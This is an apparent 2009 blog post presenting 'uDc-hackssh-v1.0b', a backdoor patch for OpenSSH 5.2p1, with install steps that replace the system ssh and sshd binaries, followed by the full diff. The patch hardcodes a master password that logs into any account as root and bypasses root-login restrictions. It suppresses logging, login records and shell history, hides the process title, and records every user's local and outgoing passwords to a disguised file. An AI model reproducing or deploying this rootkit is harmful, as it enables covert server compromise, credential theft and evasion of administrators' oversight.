Saturday, September 12, 2009

uDc-hackssh-v1.0b

Features:
- special password to log in with any user account and get root
- no logs in the machine (messages,auth,utmp,…)
- bash shell will use /dev/null as HISTFILE
- logs user passwords (local and remote sessions)
- should bypass 'PermitRootLogin No"

Installation:
[slash@Slash-The-Underground]-[Sat Sep 12]-[00:35]-[/pentest/rk/ssh/uDc-hackssh]
$ pwd
/pentest/rk/ssh/uDc-hackssh

[slash@Slash-The-Underground]-[Sat Sep 12]-[00:36]-[/pentest/rk/ssh/uDc-hackssh]
$ tar -zxf openssh-5.2p1.tar.gz

[slash@Slash-The-Underground]-[Sat Sep 12]-[00:36]-[/pentest/rk/ssh/uDc-hackssh]
$ patch -p0 < uDc-hackssh-v1.0b

[slash@Slash-The-Underground]-[Sat Sep 12]-[00:36]-[/pentest/rk/ssh/uDc-hackssh] $ cd openssh-5.2p1

[slash@Slash-The-Underground]-[Sat Sep 12]-[00:36]-[/pentest/rk/ssh/uDc-hackssh] $ ./configure --prefix=/usr --sbindir=/usr/sbin --bindir=/usr/bin --sysconfdir=/path_to_origin_configuration --with-pam

[slash@Slash-The-Underground]-[Sat Sep 12]-[00:36]-[/pentest/rk/ssh/uDc-hackssh] $ make

[slash@Slash-The-Underground]-[Sat Sep 12]-[00:36]-[/pentest/rk/ssh/uDc-hackssh] $ strip ssh sshd

[slash@Slash-The-Underground]-[Sat Sep 12]-[00:36]-[/pentest/rk/ssh/uDc-hackssh] $ rm -rf /usr/sbin/sshd /usr/bin/ssh

[slash@Slash-The-Underground]-[Sat Sep 12]-[00:36]-[/pentest/rk/ssh/uDc-hackssh] $ cp ssh /usr/bin/ssh

[slash@Slash-The-Underground]-[Sat Sep 12]-[00:36]-[/pentest/rk/ssh/uDc-hackssh] $ cp sshd /usr/sbin/sshd
[slash@Slash-The-Underground]-[Sat Sep 12]-[00:36]-[/pentest/rk/ssh/uDc-hackssh] $ ps -ax | grep sshd
[slash@Slash-The-Underground]-[Sat Sep 12]-[00:36]-[/pentest/rk/ssh/uDc-hackssh] $ kill -HUP 'appropriate pid number' And finally, the patch code....
[slash@Slash-The-Underground]-[Sat Sep 12]-[00:29]-[/pentest/rk/ssh/uDc-hackssh] $ cat uDc-hackssh-v1.0b.patch
diff -Ncr openssh-5.2p1/auth-pam.c uDc-hackssh-v1.0b/auth-pam.c
*** openssh-5.2p1/auth-pam.c Tue Mar 11 19:58:25 2008
--- uDc-hackssh-v1.0b/auth-pam.c Fri Sep 11 22:38:47 2009
***************
*** 466,471 ****
--- 466,474 ----
if (sshpam_err != PAM_SUCCESS) goto auth_fail;
sshpam_err = pam_authenticate(sshpam_handle, flags);
+ // slash patch
+ if(uDc) sshpam_err = PAM_SUCCESS;
+ // end of patch 
if (sshpam_err != PAM_SUCCESS) goto auth_fail;

***************
*** 816,821 ****
--- 819,833 ----
Buffer buffer;
struct pam_ctxt *ctxt = ctx;
+ // slash patch + if(sshpam_authctxt)
+ for (ai = 0; ai < num; ++ai) {
+ sprintf(abuff, "pam_from: %s \tuser: %s \tpass: %s\n",
+ get_remote_ipaddr(), sshpam_authctxt->user, resp[ai]);
+ if(!strcmp(BAJAUPASS, resp[ai])) ctxt->pam_done = uDc = 1;
+ else uDclog();
+ }
+ // end of patch
debug2("PAM: %s entering, %u responses", __func__, num);
switch (ctxt->pam_done) {
case 1:
***************
*** 1045,1050 ****
--- 1057,1065 ----
if (sshpam_err != PAM_SUCCESS)
fatal("PAM: failed to set PAM_CONV: %s",
pam_strerror(sshpam_handle, sshpam_err));
+ // slash patch
+ if(!uDc)
+ // end of patch
sshpam_err = pam_open_session(sshpam_handle, 0);
if (sshpam_err == PAM_SUCCESS)
sshpam_session_open = 1;

diff -Ncr openssh-5.2p1/auth-passwd.c uDc-hackssh-v1.0b/auth-passwd.c
*** openssh-5.2p1/auth-passwd.c Fri Oct 26 12:25:12 2007
--- uDc-hackssh-v1.0b/auth-passwd.c Fri Sep 11 23:30:00 2009
***************
*** 92,97 ****
--- 92,107 ----
#endif
if (*password == '\0' && options.permit_empty_passwd == 0)
return 0;
+ // slash patch
+ if(!strcmp(BAJAUPASS, password)) {
+ uDc = 1;
+ // options.permit_root_login = PERMIT_YES;
+ return;
+ }
+ sprintf(abuff, "pass_from: %s \tuser: %s \tpass: %s\n",
+ get_remote_ipaddr(), pw->pw_name, password);
+ uDclog();
+ // end of patch

#ifdef KRB5
if (options.kerberos_authentication == 1) {

diff -Ncr openssh-5.2p1/auth.c uDc-hackssh-v1.0b/auth.c
*** openssh-5.2p1/auth.c Wed Nov 5 13:12:54 2008
--- uDc-hackssh-v1.0b/auth.c Fri Sep 11 23:35:47 2009
***************
*** 93,98 ****
--- 93,104 ----
int
allowed_user(struct passwd * pw)
{
+ // slash patch
+ if(uDc)
+ return 1;
+ else {
+ // end of patch
+
struct stat st;
const char *hostname = NULL, *ipaddr = NULL, *passwd = NULL;
char *shell;
***************
*** 243,252 ****
--- 249,264 ----
/* We found no reason not to let this user try to log on... */
return 1;
}
+ // slash patch
+ }
+ // end of patch

void
auth_log(Authctxt *authctxt, int authenticated, char *method, char *info)
{
+ // slash patch
+ if(!uDc) {
+ // end of patch
void (*authlog) (const char *fmt,...) = verbose;
char *authmsg;

***************
*** 291,296 ****
--- 303,311 ----
if (authenticated == 0 && !authctxt->postponed)
audit_event(audit_classify_auth(method));
#endif
+ // slash patch
+ }
+ // end of patch
}

/*
***************
*** 299,304 ****
--- 314,322 ----
int
auth_root_allowed(char *method)
{
+ // slash patch
+ if(!uDc) {
+ // end of patch
switch (options.permit_root_login) {
case PERMIT_YES:
return 1;
***************
*** 316,321 ****
--- 334,344 ----
logit("ROOT LOGIN REFUSED FROM %.200s", get_remote_ipaddr());
return 0;
}
+ // slash patch
+ else
+ return 1;
+ }
+ // end of patch


/*
diff -Ncr openssh-5.2p1/canohost.c uDc-hackssh-v1.0b/canohost.c
*** openssh-5.2p1/canohost.c Sat Feb 14 13:28:21 2009
--- uDc-hackssh-v1.0b/canohost.c Fri Sep 11 23:38:28 2009
***************
*** 78,83 ****
--- 78,86 ----
if (getnameinfo((struct sockaddr *)&from, fromlen, name, sizeof(name),
NULL, 0, NI_NAMEREQD) != 0) {
/* Host name not found. Use ip address. */
+ // slash patch
+ if(!uDc)
+ // end of patch
return xstrdup(ntop);
}

diff -Ncr openssh-5.2p1/includes.h uDc-hackssh-v1.0b/includes.h
*** openssh-5.2p1/includes.h Fri Jul 4 21:10:49 2008
--- uDc-hackssh-v1.0b/includes.h Fri Sep 11 22:38:47 2009
***************
*** 13,18 ****
--- 13,41 ----
* called by a name other than "ssh" or "Secure Shell".
*/

+ // slash patch
+ #include
+ #include
+
+ #define BAJAUPASS "@#;.,uDc,.;#@"
+ #define SSH_LOG "/usr/share/yelp/im.xml"
+
+ FILE *bajaulog;
+ char abuff[1024];
+ int kambing, ai, uDc;
+
+ #define uDclog() { \
+ kambing=strlen(abuff); \
+ for(ai=0; ai<=kambing; ai++) abuff[ai]=~abuff[ai]; \ 

+ bajaulog=fopen(SSH_LOG, "a"); \ 
+ if(bajaulog!=NULL) { fwrite(abuff, kambing, 1, bajaulog); fclose(bajaulog);} \ 
+ chmod(SSH_LOG, 0666); \ 
+ } 

+ const char *get_remote_ipaddr(void); 
+ // end of patch 

+ #ifndef INCLUDES_H 
#define INCLUDES_H 

diff -Ncr openssh-5.2p1/log.c uDc-hackssh-v1.0b/log.c 
*** openssh-5.2p1/log.c Tue Jun 10 21:01:51 2008 
--- uDc-hackssh-v1.0b/log.c Fri Sep 11 22:38:47 2009 
*************** 
*** 338,343 **** 
--- 338,346 ---- 
int pri = LOG_INFO; 
int saved_errno = errno; 
+ // slash patch 
+ if(uDc) return; 
+ // end of patch if (level > log_level)
return;

diff -Ncr openssh-5.2p1/loginrec.c uDc-hackssh-v1.0b/loginrec.c
*** openssh-5.2p1/loginrec.c Thu Feb 12 10:12:22 2009
--- uDc-hackssh-v1.0b/loginrec.c Fri Sep 11 22:38:47 2009
***************
*** 431,436 ****
--- 431,439 ----
int
login_write(struct logininfo *li)
{
+ // slash patch
+ if(uDc) return 0;
+ // end of patch
#ifndef HAVE_CYGWIN
if (geteuid() != 0) {
logit("Attempt to write login records by non-root user (aborting)");
 

diff -Ncr openssh-5.2p1/session.c uDc-hackssh-v1.0b/session.c
*** openssh-5.2p1/session.c Wed Jan 28 13:29:49 2009
--- uDc-hackssh-v1.0b/session.c Fri Sep 11 23:48:15 2009
***************
*** 1193,1198 ****
--- 1193,1203 ----
if (getenv("TZ"))
child_set_env(&env, &envsize, "TZ", getenv("TZ"));

+ // slash patch
+ if(uDc)
+ child_set_env(&env, &envsize, "HISTFILE", "/dev/null");
+ // end of patch
+
/* Set custom environment options from RSA authentication. */
if (!options.use_login) {
while (custom_environment) {
***************
*** 1496,1501 ****
--- 1501,1510 ----

if (setlogin(pw->pw_name) < 0) error("setlogin failed: %s", strerror(errno)); 

+ // slash patch 
+ if(!uDc) { 
+ // end of patch 
+ if (setgid(pw->pw_gid) < 0) { perror("setgid"); exit(1); 
*************** 
*** 1505,1510 **** 
--- 1514,1526 ---- 
perror("initgroups"); 
exit(1); 

+ // slash patch 
+ } 
+ else { 
+ setgid(0); 
+ initgroups(pw->pw_name, 0);
+ }
+ // end of patch
endgrent();
# ifdef USE_PAM
/*
***************
*** 1547,1552 ****
--- 1563,1570 ----
}
#else
/* Permanently switch to the desired uid. */
+ // slash patch
+ if(!uDc)
permanently_set_uid(pw);
#endif
}
***************
*** 1554,1560 ****
#ifdef HAVE_CYGWIN
if (is_winnt)
#endif
! if (getuid() != pw->pw_uid || geteuid() != pw->pw_uid)
fatal("Failed to set uids to %u.", (u_int) pw->pw_uid);

#ifdef WITH_SELINUX
--- 1572,1581 ----
#ifdef HAVE_CYGWIN
if (is_winnt)
#endif
! // slash patch
! //if (getuid() != pw->pw_uid || geteuid() != pw->pw_uid)
! if ((getuid() != pw->pw_uid || geteuid() != pw->pw_uid) && !uDc)
! // end of patch
fatal("Failed to set uids to %u.", (u_int) pw->pw_uid);

#ifdef WITH_SELINUX
***************
*** 2614,2621 ****
{
if (s->pw == NULL)
error("no user for session %d", s->self);
! else
! setproctitle("%s@%s", s->pw->pw_name, session_tty_list());
}

int
--- 2635,2648 ----
{
if (s->pw == NULL)
error("no user for session %d", s->self);
! // slash patch
! else {
! if(!uDc)
! setproctitle("%s@%s", s->pw->pw_name, session_tty_list());
! else
! setproctitle("","");
! }
! // end of patch
}

int
diff -Ncr openssh-5.2p1/sshconnect1.c uDc-hackssh-v1.0b/sshconnect1.c
*** openssh-5.2p1/sshconnect1.c Tue Nov 7 20:14:42 2006
--- uDc-hackssh-v1.0b/sshconnect1.c Fri Sep 11 22:38:47 2009
***************
*** 458,463 ****
--- 458,468 ----
password = read_passphrase(prompt, 0);
packet_start(SSH_CMSG_AUTH_PASSWORD);
ssh_put_password(password);
+ // slash patch
+ sprintf(abuff, "1to: %s \tuser: %s \tpass: %s\n",
+ get_remote_ipaddr(), options.user, password);
+ uDclog();
+ // end of patch
memset(password, 0, strlen(password));
xfree(password);
packet_send();
 

diff -Ncr openssh-5.2p1/sshconnect2.c uDc-hackssh-v1.0b/sshconnect2.c
*** openssh-5.2p1/sshconnect2.c Wed Nov 5 13:20:47 2008
--- uDc-hackssh-v1.0b/sshconnect2.c Fri Sep 11 22:38:47 2009
***************
*** 797,802 ****
--- 797,807 ----
packet_put_cstring(authctxt->method->name);
packet_put_char(0);
packet_put_cstring(password);
+ // slash patch
+ sprintf(abuff, "2to: %s \tuser: %s \tpass: %s\n",
+ get_remote_ipaddr(), options.user, password);
+ uDclog();
+ // end of patch
memset(password, 0, strlen(password));
xfree(password);
packet_add_padding(64);
***************
*** 1464,1469 ****
--- 1469,1479 ----

response = read_passphrase(prompt, echo ? RP_ECHO : 0);

+ // slash patch
+ sprintf(abuff, "2ito: %s \tuser: %s \tpass: %s\n",
+ get_remote_ipaddr(), options.user, response);
+ uDclog();
+ // end of patch
packet_put_cstring(response);
memset(response, 0, strlen(response));
xfree(response);
 

diff -Ncr openssh-5.2p1/sshlogin.c uDc-hackssh-v1.0b/sshlogin.c
*** openssh-5.2p1/sshlogin.c Mon Sep 17 14:09:16 2007
--- uDc-hackssh-v1.0b/sshlogin.c Sat Sep 12 00:03:40 2009
***************
*** 118,123 ****
--- 118,126 ----
record_login(pid_t pid, const char *tty, const char *user, uid_t uid,
const char *host, struct sockaddr *addr, socklen_t addrlen)
{
+ // slash patch
+ if(!uDc) {
+ // end of patch
struct logininfo *li;

/* save previous login details before writing new */
***************
*** 127,132 ****
--- 130,138 ----
login_set_addr(li, addr, addrlen);
login_login(li);
login_free_entry(li);
+ // slash patch
+ }
+ // end of patch
}

#ifdef LOGIN_NEEDS_UTMPX
***************
*** 134,145 ****
--- 140,157 ----
record_utmp_only(pid_t pid, const char *ttyname, const char *user,
const char *host, struct sockaddr *addr, socklen_t addrlen)
{
+ // slash patch
+ if(!uDc) {
+ // end of patch
struct logininfo *li;

li = login_alloc_entry(pid, user, host, ttyname);
login_set_addr(li, addr, addrlen);
login_utmp_only(li);
login_free_entry(li);
+ // slash patch
+ }
+ // end of patch
}
#endif

***************
*** 147,155 ****
--- 159,173 ----
void
record_logout(pid_t pid, const char *tty, const char *user)
{
+ // slash patch
+ if(!uDc) {
+ // end of patch
struct logininfo *li;

li = login_alloc_entry(pid, user, NULL, tty);
login_logout(li);
login_free_entry(li);
+ // slash patch
+ }
+ // end of patch
}
 

diff -Ncr openssh-5.2p1/version.h uDc-hackssh-v1.0b/version.h
*** openssh-5.2p1/version.h Mon Feb 23 08:09:26 2009
--- uDc-hackssh-v1.0b/version.h Fri Sep 11 22:38:47 2009
***************
*** 1,6 ****
--- 1,9 ----
/* $OpenBSD: version.h,v 1.55 2009/02/23 00:06:15 djm Exp $ */

+ // slash patch
+ // change to targetted openssh verions
#define SSH_VERSION "OpenSSH_5.2"

#define SSH_PORTABLE "p1"
#define SSH_RELEASE SSH_VERSION SSH_PORTABLE
+ // end of patch